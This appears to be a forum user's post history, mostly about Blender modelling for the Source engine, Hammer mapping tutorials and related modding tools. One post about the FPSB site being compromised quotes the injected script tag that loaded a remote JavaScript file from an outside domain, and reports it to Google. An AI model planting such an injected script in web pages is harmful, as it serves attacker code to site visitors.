    Blender 3D modelling walktrough

Late reply here. There is no size difference as far as I know. 1 Blender unit = 1 Hammer unit I wouldn't advise modeling something in Blender using the same units you would in Hammer though (eg: model a truck 100 or so units in overall length). Blender can get a bit unwieldy when you get...

Some of the best Hammer Tut videos out there..

D-Double Post! Anyways, I still think you're missing my point, I'm not trying to say he didn't make some glaringly bad mistakes, I know he did. My point is that in spite of these mistakes, a new mapper would still come out ahead by watching his videos because the skill gained from the amount...

    Blender 3D modelling walktrough

Hmm... Well, I just went back through my the tutorial and I did notice one thing when trying to compile the model for TF2: I had to manually create most (if not all) of the folders used in the compiling stage (materialsrc, modelsrc, models, materials, materials\models) before everything would...

Some of the best Hammer Tut videos out there..

All right, find me 5 of his videos from here where a new mapper would have either gained nothing of value or be in worse shape (ie they gained only wrong information or they were told something so bad it overshadowed any valuable info they might have gathered from the video) after having watched...

Do you have the right values assigned in the VMT (VertexLitGeneric, etc)? That's all I can think of off the top of my head. Now I see what you're getting at. To go into some details here, this is the third or fourth iteration of the tutorial I've gone through. The other Blender tutorial on...

Um, not quite sure what you're saying is wrong here. Mind going into some more detail? What would you do differently?

I think your kneejerking a bit here. I'm not completely disagreeing with you, some of the time he's completely off, but more often then not he's correct (or at least mostly correct). I'd say it's wasteful to discount all of his videos because he was wrong a few times. Everyone makes mistakes...

    Blender 3D modelling walktrough

Just a heads up, I put together a basic guide on the VDC for creating basic models with Blender. It covers a very basic introduction to modeling with Blender and the procidure for getting a Blender model into the Source Engine. It still needs some touching up, but should be a good starting...

Modeling: I can't get what I want. Tips?

I forgot about that. I remember him mentioning the trip on l4dmaps, but I never heard anything else about it. Didn't he have pictures? I don't think most modelers make much stuff on their own. Most use real or hand drawn objects as a reference and just try to recreate them the best they...

Modeling: I can't get what I want. Tips?

Wow, I was in disbelief reading this until I checked Autodesk's site, I was sure I had scene it still there not too long ago. This decision doesn't make much sense to me at all, it's like there shooting themselves in the foot. It's hard to say without knowing the specifics though, Autodesk did...

    I'm hating Apple even more

Possible, I've never heard about a 28 day guarantee, a google search didn't giving me anything relevant either. For me the funny thing is I've never actually bought anything from Apple until getting an iPod Touch last month, but I've done support calls for other people (friends, relatives...

    I'm hating Apple even more

Honestly, if I wanted a laptop an Apple would be a real consideration for me considering repair costs and my experience with Apple's overall reliability and support. I've never had a problem with Apple's tech support for the several times I've called them over the years. For certain companies...

    hammer background

Truth. Actually, I'm a little surprised the last update didn't get more attention. Now all Valve customers who have access to the Source SDK also have access to the SketchUp plugins, not just Left 4 Dead owners. (Although SDK Content might need a refresh before it shows up in the "sourcesdk"...

What do you dislike about Hammer?

Heh, completely forgot about this thread. Looks good so far, I almost thought you had given up on this at first. :P I agree with you on delicate, but I didn't find it too hard to learn, Hammer's mostly point, click, and drag. For me it was a bit intimidating at first (especially as I didn't...

    Valve hates snipers

Using bots isn't a reliable way for testing hitboxes. I've seen a noticeable difference between hitboxes for bots and actual "live" players, the bot code in general has always been somewhat buggy.

    FPSB Is having site problems.

Looks to have been done by the same person as well, the exploit is very similar to the code used the last time: script src=//www.lil9.cn/c.js I went ahead and re-reported the site to Google's Safe Browsing site.

Robin Walker on the New Payload HUD, Ambidextrous Weapons, and the New Tree Models

Well IANAL, but to be fair, my guess is it was that the Mod Tool (or a cracked version of the full XSI) was used to create the model that was the problem, not Softimage/XSI itself. Valve used Softimage/XSI themselves to create several models for Half-Life 2. While the Mod Tool is fine for...

    Unreal Editor 3, anyone?

There's a few tutorials on 3dbuzz.com, although you have to register first to see them (registration is free). I also ran across a set on Veoh a while back done by a teacher. There's a few on Vimeo as well. The one catch to the Unreal Editor 3 is it uses tons of resources (even more then your...
